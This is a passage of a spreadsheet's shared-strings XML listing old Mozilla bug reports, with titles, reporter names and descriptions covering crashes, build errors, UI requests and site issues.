  </si>
  <si>
    <t>WEBSITES_GRAVEYARD-501330</t>
  </si>
  <si>
    <t>spreadthunderbird.com</t>
  </si>
  <si>
    <t>Requesting a copy of the spreadthunderbird database</t>
  </si>
  <si>
    <t>Hi Gozer
Can i request a copy of the spreadthunderbird database for offline investigation of an affiliate problem on spreadthunderbird.com
The affiliate problem (reported by Otto) occurs for a particular user 	satanux whose total is increasing while their period points remain zero.
Best Paul</t>
  </si>
  <si>
    <t>NSS-376422</t>
  </si>
  <si>
    <t>Login Fails if token is reset while waiting for a password.</t>
  </si>
  <si>
    <t>If something resets the token while the application is prompting the user for a password then a login will fail.
This is more a fault tolerance then an actual bug.</t>
  </si>
  <si>
    <t>CORE-214954</t>
  </si>
  <si>
    <t>embedded stylesheets from scripts don't work like importStylesheet(elem)</t>
  </si>
  <si>
    <t>stupid bug patch coming up.</t>
  </si>
  <si>
    <t>CORE-341494</t>
  </si>
  <si>
    <t>phishing: target of nested link depends on mouse button used when clicking</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 de rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8b2) Gecko/20050702
leftclick opens one URL middleclick another after js was used to change
to
Reproducible: Always
Steps to Reproduce:
click on the image with left/middle mousebutton
Actual Results:  
different sites are opened
Expected Results:  
both should act the same
happens with vanilla nightly build
could possibly used for phishing</t>
  </si>
  <si>
    <t>tsattler</t>
  </si>
  <si>
    <t>CORE-170539</t>
  </si>
  <si>
    <t>prefs.js gets wiped - all mail/news accounts settings lost</t>
  </si>
  <si>
    <t>I booted up my machine and went to check my mail one day and all the accounts
and everything had disappeared. prefs.js turned out to have been wiped.
tvujmejl.cz@mujmejl.cz - (Daniel Hrbac) told me on the mail-news group that this
was caused by quickstart so I've stopped using that.
There are several reports of this bug up on the newsgroup - I feel that it is
very serious if you have a lot of accounts set up.
I will not be able to recommend that people use Moz mail untill this is fixed.
I am happy to do any testing required etc.
Russell</t>
  </si>
  <si>
    <t>ccarlen</t>
  </si>
  <si>
    <t>boblists</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-514082</t>
  </si>
  <si>
    <t>PTO app update for intranet [v4]</t>
  </si>
  <si>
    <t>There's new PTO stuff on SVN with new features like SQL exporting (details exporting is limited to HR people) bookmarkable date filters in the export UI editing existing PTO entries (per Karen's request and bunch of use cases) and WebKit support (so you can PTO while you iPhone!).
Editing perm rules are as follows:
* If you belong to the people department you can edit anyone's entry at anytime.
* If not you can only edit your own entries.
* But if the time of editing is past the time when the PTO entry ends the editing is not allowed.
In addition to svn up the config file has 3 new variables near the end of the file. Please refer to config-dist.php for the new variables.</t>
  </si>
  <si>
    <t>kourge</t>
  </si>
  <si>
    <t>WEBSITES-437965</t>
  </si>
  <si>
    <t>store.mozilla.org</t>
  </si>
  <si>
    <t>Product ID not sanitized before page loads (harmless but still a bug)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win 9x 4.90 sv-SE rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Build Identifier: -
If the product information page is loaded with an invalid product ID parameter the page will display as usual but with a blank image and some variable names.
Examples are posted in the Steps to reproduce information below.
Reproducible: Always
Steps to Reproduce:
1.http://intlstore.mozilla.org/product_info.php?products_id=-1
2.http://intlstore.mozilla.org/product_info.php?products_id=99999999999
3.http://intlstore.mozilla.org/product_info.php?products_id=HELLO
Actual Results:  
-
Expected Results:  
Check if the supplied ID is invalid and in that case just echo Invalid ID instead of loading the normal page.</t>
  </si>
  <si>
    <t>u242531</t>
  </si>
  <si>
    <t>uber0n</t>
  </si>
  <si>
    <t>FIREFOX-251767</t>
  </si>
  <si>
    <t>Ctrl+Shift+I shortcut for DOM Inspector not shown in menu</t>
  </si>
  <si>
    <t>Tools &gt; DOM Inspector should show the Ctrl+Shift+I shortcut.  
In bug 150650 comment 3 Alex Vincent said the shortcut wasn't shown because the
menu item inspects the window while the shortcut inspects the document but now
both the menu item and the shortcut inspect the document.</t>
  </si>
  <si>
    <t>CORE-30500</t>
  </si>
  <si>
    <t>[XBL] Make XUL aggregation XBL-savvy</t>
  </si>
  <si>
    <t>The aggregation on XUL elements must know how to use XBL binding bases in 
addition to tag names.  For example a new kind of tag called  that 
derives from  should still be queryable to a nsIDOMXULButtonElement.</t>
  </si>
  <si>
    <t>SEAMONKEY-151336</t>
  </si>
  <si>
    <t>[LINUX] can not drag bookmarks from a folder in the personal toolbar</t>
  </si>
  <si>
    <t>to open a page from personal toolbar you can either click it or
drag it into the browser (or tab) window. OK so far.
But if the bookmark resides in a folder you can *not* drag it there.
Please fix</t>
  </si>
  <si>
    <t>christophe.thalet</t>
  </si>
  <si>
    <t>BUGZILLA-449504</t>
  </si>
  <si>
    <t>Release Notes no longer need upgrading instructions</t>
  </si>
  <si>
    <t>I just overhauled the upgrading section of the docs in bug 371020 and so we should just link to the docs instead of giving upgrade instructions in the release notes.</t>
  </si>
  <si>
    <t>CORE-88035</t>
  </si>
  <si>
    <t>[QUIRKS]Table wrapped in  or  miscalculates height=100%</t>
  </si>
  <si>
    <t>If you wrap a table in a  tag the definition of height=100% changes
meaning.  Granted 'ing a 100% x 100% table is unnecessary but this is
different behavior from NS4 and IE.
My test case has two pages one with the table wrapped in a center and the other
does not.</t>
  </si>
  <si>
    <t>layout.tables</t>
  </si>
  <si>
    <t>hume</t>
  </si>
  <si>
    <t>CORE-429123</t>
  </si>
  <si>
    <t>Assertion failure: (cx)-&gt;requestDepth || (cx)-&gt;thread == (cx)-&gt;runtime-&gt;gcThread in JS_GetReservedSlot</t>
  </si>
  <si>
    <t>Created attachment 315764
request
in bug 410486 comment 13 Martin Mokrejs wrote:
I tried your patch from [attachment 314876] but it did not help:
(gdb) 
++DOMWINDOW == 11 (0x82120fc) [serial = 12] [Outer = 0x8211500]
Assertion failure: (cx)-&gt;requestDepth || (cx)-&gt;thread ==
(cx)-&gt;runtime-&gt;gcThread at jsapi.c:3531
Program received signal SIGTRAP Trace/breakpoint trap.
JS_Assert (s=0xb7eecd48 (cx)-&gt;requestDepth || (cx)-&gt;thread ==
(cx)-&gt;runtime-&gt;gcThread file=0xb7eecd40 jsapi.c ln=3531) at jsutil.c:63
/scratch/mozilla/js/src/jsutil.c:63:2308:beg:0xb7ed1132
Current language:  auto currently c
(gdb) where
#0  JS_Assert (s=0xb7eecd48 (cx)-&gt;requestDepth || (cx)-&gt;thread ==
(cx)-&gt;runtime-&gt;gcThread file=0xb7eecd40 jsapi.c ln=3531) at jsutil.c:63
#1  0xb7e0f3e0 in JS_SetProperty (cx=0x89f2720 obj=0x8b50700 name=0xb62c2e9f
HTTPIndex vp=0xbfea2e54) at jsapi.c:3531
#2  0xb628dfb5 in nsHTTPIndex::OnStartRequest (this=0x8c52700
request=0x87e3090 aContext=0x0) at nsDirectoryViewer.cpp:309</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-213881</t>
  </si>
  <si>
    <t>RDF</t>
  </si>
  <si>
    <t>Properties for large RDF literals are repeated</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.4) Gecko/20030721
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.4) Gecko/20030721
When parsing a RDF model which contains a large literal (I think it's  4k or
larger literal) Mozilla splits the literal so when serializing the model
again the resource which contained the original property has the property
repeated as many times as (literal_length div 4096)+1 containing the chunks of
the original literal.
Reproducible: Always
Steps to Reproduce:
1. Parse String containing a RDF model with a 4096 bytes or larger literal
2. Serialize the content of the RDF model
Actual Results:  
Mozilla divided the literal so many properties with the same name appeared
containing the different chunks of the original literal
Expected Results:  
Keep the literal in just one property</t>
  </si>
  <si>
    <t>sisqbatas</t>
  </si>
  <si>
    <t>MOZILLA.ORG-440907</t>
  </si>
  <si>
    <t>getfirebug.com svn access for John Barton</t>
  </si>
  <si>
    <t>hi I sent a from by fax to Knous.
I need svn access for
https://bugzilla.mozilla.org/show_bug.cgi?id=440845</t>
  </si>
  <si>
    <t>chizu</t>
  </si>
  <si>
    <t>CORE-64146</t>
  </si>
  <si>
    <t>Delay nsCharsetMenu initialization to avoid consuming ~2% of startup time</t>
  </si>
  <si>
    <t>The constructor for nsCharsetMenu seems according to both a jprof profile and
printfs that I put at the beginning and end of the constructor to take about
1/20 of our startup time (about half a second on my machine).  It is called once
during startup.
This seems a bit excessive considering that it looks like what it is doing is
sorting a bunch of menus that don't need to be shown yet (7 of the 10 jprof
stack traces end up within the call to NS_QuickSort in
nsCharsetMenu::ReorderMenuItemArray).  If it can't be made faster (which I
certainly hope it could be) perhaps this initialization could be delayed until
a menu is shown?  For most runs of the browser this probably won't happen at
all since most of the time seems to deal with the More menu (if I understand
the code correctly).</t>
  </si>
  <si>
    <t>jbetak</t>
  </si>
  <si>
    <t>CORE-416101</t>
  </si>
  <si>
    <t>Mingw build error in ../mozilla/dom/src/json/nsJSON.cpp</t>
  </si>
  <si>
    <t>I believe this is a regression from check-in for Bug 410890.
I get this now:
Building deps for /cygdrive/d/mozilla/mozilla/dom/src/json/nsJSON.cpp
/cygdrive/d/mozilla/mozilla/build/cygwin-wrapper g++ -mno-cygwin -o nsJSON.o -c
 -D_IMPL_NS_LAYOUT -DMOZILLA_INTERNAL_API -DOSTYPE=\WINNT5.1\ -DOSARCH=WINNT -
I/cygdrive/d/mozilla/mozilla/dom/src/json/../base -I/cygdrive/d/mozilla/mozilla/
content/events/src -I/cygdrive/d/mozilla/mozilla/dom/src/json -I. -I../../../dis
t/include/xpcom -I../../../dist/include/string -I../../../dist/include/content -
I../../../dist/include/caps -I../../../dist/include/js -I../../../dist/include/l
ocale -I../../../dist/include/layout -I../../../dist/include/necko -I../../../di
st/include/pref -I../../../dist/include/uconv -I../../../dist/include/unicharuti
l -I../../../dist/include/widget -I../../../dist/include/xpconnect -I../../../di
st/include   -I../../../dist/include/dom -I../../../dist/include/nspr     -I../.
./../dist/sdk/include       -fno-rtti -fno-exceptions -Wall -Wconversion -Wpoint
er-arith -Woverloaded-virtual -Wsynth -Wno-ctor-dtor-privacy -Wno-non-virtual-dt
or -Wcast-align -Wno-long-long -pedantic -fno-strict-aliasing -mms-bitfields -pi
pe  -DNDEBUG -DTRIMMED -O   -DWINVER=0x501 -D_WIN32_WINNT=0x501 -D_WIN32_IE=0x05
00 -DX_DISPLAY_MISSING=1 -DMOZILLA_VERSION=\1.9b4pre\ -DMOZILLA_VERSION_U=1.9b
4pre -DHAVE_SNPRINTF=1 -D_WINDOWS=1 -D_WIN32=1 -DWIN32=1 -DXP_WIN=1 -DXP_WIN32=1
 -DHW_THREADS=1 -DSTDC_HEADERS=1 -DWIN32_LEAN_AND_MEAN=1 -DNO_X11=1 -D_X86_=1 -D
D_INO=d_ino -DSTDC_HEADERS=1 -DHAVE_DIRENT_H=1 -DHAVE_GETOPT_H=1 -DHAVE_MEMORY_H
=1 -DHAVE_UNISTD_H=1 -DHAVE_MALLOC_H=1 -DHAVE_LIBM=1 -DNO_X11=1 -DMMAP_MISSES_WR
ITES=1 -DHAVE_STRERROR=1 -DHAVE_SNPRINTF=1 -DHAVE_MEMMOVE=1 -DHAVE_RINT=1 -DVA_C
OPY=va_copy -DHAVE_VA_COPY=1 -DMOZ_EMBEDDING_LEVEL_DEFAULT=1 -DMOZ_EMBEDDING_LEV
EL_BASIC=1 -DMOZ_EMBEDDING_LEVEL_MINIMAL=1 -DMOZ_PHOENIX=1 -DMOZ_BUILD_APP=brows
er -DMOZ_XUL_APP=1 -DMOZ_DEFAULT_TOOLKIT=\cairo-windows\ -DMOZ_THEBES=1 -DMOZ_
CAIRO_GFX=1 -DMOZ_DISTRIBUTION_ID=\org.mozilla\ -DOJI=1 -DIBMBIDI=1 -DMOZ_VIEW
_SOURCE=1 -DMOZ_XPINSTALL=1 -DMOZ_JSLOADER=1 -DNS_PRINTING=1 -DNS_PRINT_PREVIEW=
1 -DMOZ_NO_XPCOM_OBSOLETE=1 -DMOZ_XTF=1 -DMOZ_MATHML=1 -DMOZ_ENABLE_CANVAS=1 -DM
OZ_SVG=1 -DMOZ_SVG_FOREIGNOBJECT=1 -DMOZ_UPDATE_CHANNEL=default -DMOZ_PLACES=1 -
DMOZ_FEEDS=1 -DMOZ_STORAGE=1 -DMOZ_SAFE_BROWSING=1 -DMOZ_URL_CLASSIFIER=1 -DMOZ_
LOGGING=1 -DHAVE___CXA_DEMANGLE=1 -DHAVE__UNWIND_BACKTRACE=1 -DMOZ_USER_DIR=\Mo
zilla\ -DHAVE_STDINT_H=1 -DHAVE_INTTYPES_H=1 -DHAVE_UINT64_T=1 -DMOZ_XUL=1 -DMO
Z_PROFILELOCKING=1 -DMOZ_RDF=1 -DMOZ_MORKREADER=1 -DMOZ_DLL_SUFFIX=\.dll\ -DJS
_THREADSAFE=1 -DMOZILLA_LOCALE_VERSION=\1.9a1\ -DMOZILLA_REGION_VERSION=\1.9a
1\ -DMOZILLA_SKIN_VERSION=\1.8\  -D_MOZILLA_CONFIG_H_ -DMOZILLA_CLIENT /cygdr
ive/d/mozilla/mozilla/dom/src/json/nsJSON.cpp
d:/mozilla/mozilla/dom/src/json/nsJSON.cpp: In member function `nsresult nsJSONL
istener::HandleString(const PRUnichar* PRUint32)':
d:/mozilla/mozilla/dom/src/json/nsJSON.cpp:1276: error: invalid conversion from
`const PRUnichar*' to `const jschar*'
make[6]: *** [nsJSON.o] Error 1
make[6]: Leaving directory `/cygdrive/d/mozilla/mozilla/object-mingw/dom/src/jso
n'
make[5]: *** [libs] Error 2
make[5]: Leaving directory `/cygdrive/d/mozilla/mozilla/object-mingw/dom/src'
make[4]: *** [libs] Error 2
make[4]: Leaving directory `/cygdrive/d/mozilla/mozilla/object-mingw/dom'
make[3]: *** [libs_tier_gecko] Error 2
make[3]: Leaving directory `/cygdrive/d/mozilla/mozilla/object-mingw'
make[2]: *** [tier_gecko] Error 2
make[2]: Leaving directory `/cygdrive/d/mozilla/mozilla/object-mingw'
make[1]: *** [alldep] Error 2
make[1]: Leaving directory `/cygdrive/d/mozilla/mozilla/object-mingw'
make: *** [alldep] Error 2</t>
  </si>
  <si>
    <t>bengt.erik.soderstrom</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-637428</t>
  </si>
  <si>
    <t>Make spidermonkey builds use debug by default</t>
  </si>
  <si>
    <t>Created attachment 515716
Change --disable-debug to --enable-debug
A few build errors crept into the nomethodjit builds in debug code. I guess there is more value in --enable-debug than --disable-debug so this patch just changes everything to debug.</t>
  </si>
  <si>
    <t>paul.biggar</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS_GRAVEYARD-115295</t>
  </si>
  <si>
    <t>can't set breakpoints in global scope</t>
  </si>
  <si>
    <t>description says it all.</t>
  </si>
  <si>
    <t>NSS-268502</t>
  </si>
  <si>
    <t>Some problems in ckfw.h</t>
  </si>
  <si>
    <t>By code inspection I found some problems in ckfw.h.
I will attach a patch.</t>
  </si>
  <si>
    <t>CORE-70760</t>
  </si>
  <si>
    <t>run-mozilla.sh has hardcoded reference to mozilla-bin</t>
  </si>
  <si>
    <t>gtkEmbed should be a script that strats gtkEmbed-bin
in the same way that mozilla starts mozilla-bin.</t>
  </si>
  <si>
    <t>mcafee</t>
  </si>
  <si>
    <t>CORE-387584</t>
  </si>
  <si>
    <t>ASSERTION: should not have buffer of zero size [@nsTArray_base::EnsureCapacity]</t>
  </si>
  <si>
    <t>Created attachment 271713
Workaround
Somehow we're hitting this assertion:
  NS_ASSERTION(mHdr-&gt;mCapacity &gt; 0 should not have buffer of zero size)
It seems that mHdr is pointing to a valid Header with mCapacity=0 but the address of that header isn't the same as sEmptyHdr like it should be:
  if (mHdr == &amp;sEmptyHdr) {
    // NS_Alloc new data
    Header *header = static_cast
      (NS_Alloc(sizeof(Header) + capacity * elemSize))
Although gdb indicates that it *is* the same address. I think that there are multiple sEmptyHdr symbols getting linked together somehow although adding NS_HIDDEN to its declaration did not resolve the issue.
Not sure what's really going on but I'll throw this patch up in case someone needs it.</t>
  </si>
  <si>
    <t>SEAMONKEY-472716</t>
  </si>
  <si>
    <t>Need to mention notification bar in one more place in cs_priv_prefs_popup.xhtml</t>
  </si>
  <si>
    <t>Looks like we both missed the fact that the notification bar should be mentioned  in the paragraph starting at line 38 in cs_priv_prefs_popup.xhtml.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-456710</t>
  </si>
  <si>
    <t>new files missing on server update fails</t>
  </si>
  <si>
    <t>Some new files seem to be missing.
http://ftp.mozilla.org/pub/mozilla.org/addons/2313/ doesn't show the Lightning 0.9 builds (dm-ftp01.mozilla.org in the Pacific Time Zone (PST/PDT)).
Provider for Google Calendar doesn't list version 0.5: http://ftp.mozilla.org/pub/mozilla.org/addons/4631/
A friend told me that he got updates for these extensions offered but Thunderbird now fails to get the files.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-475105</t>
  </si>
  <si>
    <t>Nightly update generator recreates partial updates each time it runs</t>
  </si>
  <si>
    <t>No idea when this started as we don't keep logs but a full run takes more than 30 minutes. Will take a look at this when I can but if anyone else if feeling bold then go ahead.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-183639</t>
  </si>
  <si>
    <t>Crash |delete datasource| in NS_NewRDFInMemoryDataSource</t>
  </si>
  <si>
    <t>debug cvs build (phroggy linux gtk) from this afternoon
timeless@boffo:/public/temp/obj-i686-pc-linux-gnu-gtk/dist/bin$ ./run-mozilla.sh
-g ./xpcshell
155192.js contains the script from bug 155192 comment 0 because simford and i
encountered a crash that matches that stack so i'm about to reopen it...
(gdb) r 155192.js
Starting program:
/mnt/hda3/temp/obj-i686-pc-linux-gnu-gtk/js/src/xpconnect/shell/xpcshell 155192.js
GLib-CRITICAL **: file ghash.c: line 138 (g_hash_table_lookup): assertion
`hash_table != NULL' failed.
Gtk-WARNING **: gtk_type_create(): unknown parent type `21'.
GLib-CRITICAL **: file ghash.c: line 138 (g_hash_table_lookup): assertion
`hash_table != NULL' failed.
GLib-CRITICAL **: file ghash.c: line 152 (g_hash_table_insert): assertion
`hash_table != NULL' failed.
Gtk-WARNING **: invalid class type `GtkInvisible' in cast to `(unknown)'
GLib-CRITICAL **: file ghash.c: line 138 (g_hash_table_lookup): assertion
`hash_table != NULL' failed.
Gtk-WARNING **: gtk_type_create(): unknown parent type `21'.
Gtk-CRITICAL **: file gtkwidget.c: line 4871 (gtk_widget_ref): assertion
`GTK_IS_WIDGET (widget)' failed.
Gtk-WARNING **: invalid class type `GtkInvisible' in cast to `(unknown)'
Gtk-CRITICAL **: file gtkobject.c: line 457 (gtk_object_sink): assertion
`GTK_IS_OBJECT (object)' failed.
GLib-CRITICAL **: file ghash.c: line 138 (g_hash_table_lookup): assertion
`hash_table != NULL' failed.
Gtk-WARNING **: gtk_type_create(): unknown parent type `21'.
Gtk-CRITICAL **: file gtkwidget.c: line 1641 (gtk_widget_realize): assertion
`GTK_IS_WIDGET (widget)' failed.
Gtk-WARNING **: invalid class type `GtkInvisible' in cast to `(unknown)'
Gtk-CRITICAL **: file gtksignal.c: line 725 (gtk_signal_connect): assertion
`GTK_IS_OBJECT (object)' failed.
Gtk-WARNING **: invalid class type `GtkInvisible' in cast to `(unknown)'
Gtk-CRITICAL **: file gtksignal.c: line 725 (gtk_signal_connect): assertion
`GTK_IS_OBJECT (object)' failed.
Program received signal SIGSEGV Segmentation fault.
0x403606e0 in __morecore () from /lib/libc.so.6
(gdb) where
#0  0x403606e0 in __morecore () from /lib/libc.so.6
#1  0x4095c27d in NS_NewRDFInMemoryDataSource (aOuter=0x0 aIID=@0xbfffdbb0
aResult=0xbfffdbac)
    at /mnt/hda3/temp/mozilla/rdf/base/src/nsInMemoryDataSource.cpp:867
#2  0x401671f3 in nsGenericFactory::CreateInstance (this=0x80f4d80 aOuter=0x0
aIID=@0xbfffdbb0
    aResult=0xbfffdbac) at /mnt/hda3/temp/mozilla/xpcom/glue/nsGenericFactory.cpp:84
#3  0x4012313e in nsComponentManagerImpl::CreateInstance (this=0x8052d58
aClass=@0x81fe72c aDelegate=0x0
    aIID=@0xbfffdbb0 aResult=0xbfffdbac)
    at /mnt/hda3/temp/mozilla/xpcom/components/nsComponentManager.cpp:1816
#4  0x40127060 in nsComponentManager::CreateInstance (aClass=@0x81fe72c
aDelegate=0x0 aIID=@0xbfffdbb0
    aResult=0xbfffdbac) at
/mnt/hda3/temp/mozilla/xpcom/components/nsComponentManagerObsolete.cpp:102
#5  0x4039ae8d in nsJSCID::CreateInstance (this=0x81fe718 _retval=0xbfffdd7c)
    at /mnt/hda3/temp/mozilla/js/src/xpconnect/src/xpcjsid.cpp:793
#6  0x40146338 in XPTC_InvokeByIndex () from ./libxpcom.so
#7  0x403aa765 in XPCWrappedNative::CallMethod (ccx=@0xbfffde48 mode=CALL_METHOD)
    at /mnt/hda3/temp/mozilla/js/src/xpconnect/src/xpcwrappednative.cpp:2016
#8  0x403b0a05 in XPC_WN_CallMethod (cx=0x80b3490 obj=0x81bc580 argc=1
argv=0x80ceb7c vp=0xbfffdf64)
    at /mnt/hda3/temp/mozilla/js/src/xpconnect/src/xpcwrappednativejsops.cpp:1294
#9  0x40049112 in js_Invoke (cx=0x80b3490 argc=1 flags=0) at
/mnt/hda3/temp/mozilla/js/src/jsinterp.c:839
#10 0x400507a5 in js_Interpret (cx=0x80b3490 result=0xbfffe284)
    at /mnt/hda3/temp/mozilla/js/src/jsinterp.c:2803
#11 0x40049597 in js_Execute (cx=0x80b3490 chain=0x808acc0 script=0x80cea08
down=0x0 special=0
    result=0xbfffe284) at /mnt/hda3/temp/mozilla/js/src/jsinterp.c:1020
#12 0x40029b09 in JS_ExecuteScript (cx=0x80b3490 obj=0x808acc0
script=0x80cea08 rval=0xbfffe284)
    at /mnt/hda3/temp/mozilla/js/src/jsapi.c:3277
#13 0x0804a5f6 in Process (cx=0x80b3490 obj=0x808acc0 filename=0xbffff53d
155192.js filehandle=0x0)
    at /mnt/hda3/temp/mozilla/js/src/xpconnect/shell/xpcshell.cpp:479
#14 0x0804abc4 in ProcessArgs (cx=0x80b3490 obj=0x808acc0 argv=0xbffff3b8 argc=1)
    at /mnt/hda3/temp/mozilla/js/src/xpconnect/shell/xpcshell.cpp:639
#15 0x0804b32c in main (argc=1 argv=0xbffff3b8)
    at /mnt/hda3/temp/mozilla/js/src/xpconnect/shell/xpcshell.cpp:912
#16 0x4025e17d in __libc_start_main () from /lib/libc.so.6
timeless@boffo:~/mozilla/netwerk$ free
             total       used       free     shared    buffers     cached
Mem:        513068     509816       3252          0       4052     136880
-/+ buffers/cache:     368884     144184
Swap:            0          0          0
timeless@boffo:~/mozilla/netwerk$ free -m
             total       used       free     shared    buffers     cached
Mem:           501        497          3          0          3        132
-/+ buffers/cache:        361        139
Swap:            0          0          0
I have lots of dead or partially dead mozilla/viewer/xpcshell's living in gdb's
on phroggy's box.
drepper: so um is __morecore buggy?
Linux boffo 2.4.18 #9 SMP Fri Nov 22 20:06:15 PST 2002 i686 unknown</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS_GRAVEYARD-137822</t>
  </si>
  <si>
    <t>MozillaTranslator</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS_GRAVEYARD</t>
  </si>
  <si>
    <t>Shortcut keys request</t>
  </si>
  <si>
    <t>There are some vital (to me at least :) shortcut keys missing in MT5:
Alt+S for Search
Alt+C for Chrome view
Control+Enter in Edit selected phrase to simulate clicking of OK.
Especially the last one could speed up my work a lot...</t>
  </si>
  <si>
    <t>rpmdisguise-nave</t>
  </si>
  <si>
    <t>jaagup.irve</t>
  </si>
  <si>
    <t>NSPR-55740</t>
  </si>
  <si>
    <t>Typo in nsprpub/pr/include/md/_netbsd.cfg</t>
  </si>
  <si>
    <t>Due to a cut&amp;past error (or whatever) mozilla doesn't compile on sparc &amp; mips
systems.
Observed and reported by Dan McMahill  in M17 verified to
still be present in cvs checkout from yesterday.
This patch fixes it:
--- nsprpub/pr/include/md/_netbsd.cfg.orig	Wed Mar  8 11:26:18 2000
+++ nsprpub/pr/include/md/_netbsd.cfg	Sat Oct  7 17:26:26 2000
@@ -785 +785 @@
 #elif defined(__sparc__) || defined(__mips__)
-#undef IS_LITTLE_ENDIAN 1
+#undef IS_LITTLE_ENDIAN 
 #define  IS_BIG_ENDIAN 1
 #define HAVE_LONG_LONG</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-492905</t>
  </si>
  <si>
    <t>fix default secure group for quality.mozilla.org</t>
  </si>
  <si>
    <t>The default secure group for the quality.mozilla.org product appears to be core-security it should be changed to website-security. (see https://bugzilla.mozilla.org/show_activity.cgi?id=492835)</t>
  </si>
  <si>
    <t>CORE-296237</t>
  </si>
  <si>
    <t>remove assert in getElementById use the console service to provide feedback</t>
  </si>
  <si>
    <t>document.getElementById() asserts currently and going into a asserts crash
future this would seem to be a Bad Thing.  Instead of asserting or a warning
that's only of value to debug builds we should output a message to the console
service.  Patch upcoming.</t>
  </si>
  <si>
    <t>CORE-125778</t>
  </si>
  <si>
    <t>Implement getComputedStyle() for {min|max}-{height|width} properties</t>
  </si>
  <si>
    <t>I'll tackle these as soon as I can.</t>
  </si>
  <si>
    <t>CORE-211173</t>
  </si>
  <si>
    <t>unused module files in intl/locale/src/*/</t>
  </si>
  <si>
    <t>The following files appear to me to be unused:
intl/locale/src/mac/nsLocaleSHLIB.h
intl/locale/src/unix/nsLocaleSO.h
intl/locale/src/windows/nsLocaleDLL.cpp
intl/locale/src/windows/nsLocaleDLL.h
and should I think be cvs-removed.</t>
  </si>
  <si>
    <t>MOZILLA_LABS-419613</t>
  </si>
  <si>
    <t>Prism</t>
  </si>
  <si>
    <t>Shortcut creation fails for sites with no favicon</t>
  </si>
  <si>
    <t>When a site has no favicon the install-shortcut dialog still tries to use the (empty) icon to generate the shortcut. This causes the image encoding to fail and no shortcut is created (the OK button simply does nothing).</t>
  </si>
  <si>
    <t>CORE-558451</t>
  </si>
  <si>
    <t>Merge JSScope into JSScopeProperty JSObject</t>
  </si>
  <si>
    <t>See bug 555128 comment 4 for a partly worked-out description of what this would look like.</t>
  </si>
  <si>
    <t>THUNDERBIRD-261512</t>
  </si>
  <si>
    <t>Number of selected messages in status bar</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 rv:1.7.3) Gecko/20040914 Firefox/0.10
Build Identifier: Mozilla Thunderbird version 0.8 (20040913)
Let the TB display number of selected messages. It could be useful feature.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>mbockelkamp</t>
  </si>
  <si>
    <t>TOOLKIT-479543</t>
  </si>
  <si>
    <t>mozStorageConnection::Close should use NS_ERROR instead of NS_WARNING to complain about unfinalized statements</t>
  </si>
  <si>
    <t>TOOLKIT-453529</t>
  </si>
  <si>
    <t>Retain embed visits and places into the temp table in memory</t>
  </si>
  <si>
    <t>we are now saving embed visits into the disk visits table and deleting them after 24 horus mainly for link coloring if we partition visits into memory we could then hold embed visits in memory and they would become session persistent.
less disk writes less table hog.</t>
  </si>
  <si>
    <t>SEAMONKEY-475851</t>
  </si>
  <si>
    <t>Add es-AR to all-locales</t>
  </si>
  <si>
    <t>Suite files are completely uploaded to HG so we need to be added to all-locales to have Seamonkey builds and sea2x on dashboard.</t>
  </si>
  <si>
    <t>enzomatrix</t>
  </si>
  <si>
    <t>BUGZILLA-528789</t>
  </si>
  <si>
    <t>Download page update: localized templates</t>
  </si>
  <si>
    <t>Created attachment 412459
patch v1
Update to downloads page reflecting current l10n status.</t>
  </si>
  <si>
    <t>vitaly.fedrushkov</t>
  </si>
  <si>
    <t>SEAMONKEY-171408</t>
  </si>
  <si>
    <t>Style switcher not working since 1.1</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win 9x 4.90 en-US rv:1.2a) Gecko/20020910
Build Identifier: Mozilla/5.0 (Windows U Win 9x 4.90 en-US rv:1.2a) Gecko/20020910
The style switcher I use works in IE and used to work in Mozilla 1.0 I have
tested it in 1.1 and it no longer works (just found out while useing 1.2a).  I
hav tried to figure out what is wrong and have come to the conclusion that it
has to do with mozilla itself.  Feel free to look at the JS code
(http://www.hal97.com/include/styleswitcher.js).  When you use the dropdown menu
under where it says Choose a style: it should change the CSS as I said above
it does this in IE and Mozilla 1.0 but not in Mozilla 1.1 or 1.2a.  Instead of
changing styles it just does nothing (which 
Reproducible: Always
Steps to Reproduce:
1. Load page
2. Select dropdown list and select any style
Actual Results:  
Nothing
Expected Results:  
The alternate stylesheet should have been selected</t>
  </si>
  <si>
    <t>hal97</t>
  </si>
  <si>
    <t>FIREFOX-257317</t>
  </si>
  <si>
    <t>Fullscreen window management buttons need tooltips</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.2) Gecko/20040825 Firefox/0.9.1+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.2) Gecko/20040825 Firefox/0.9.1+
The buttons that appear in the top-right of the window when in fullscreen mode
don't have any tooltips.
On Windows these need the (localisable) tooltips
* Minimize
* Restore
* Close
...to be in line with IE6.
Reproducible: Always
Steps to Reproduce:
1. Enter fullscreen mode
2. Hover over one of the standard three buttons at the top left of the screen.</t>
  </si>
  <si>
    <t>CORE-206947</t>
  </si>
  <si>
    <t>Synchronous XMLHttpRequest crashes the browser on approx. 500th call on Mac and Linux [@ nsEventQueueImpl::GetYoungestActive]</t>
  </si>
  <si>
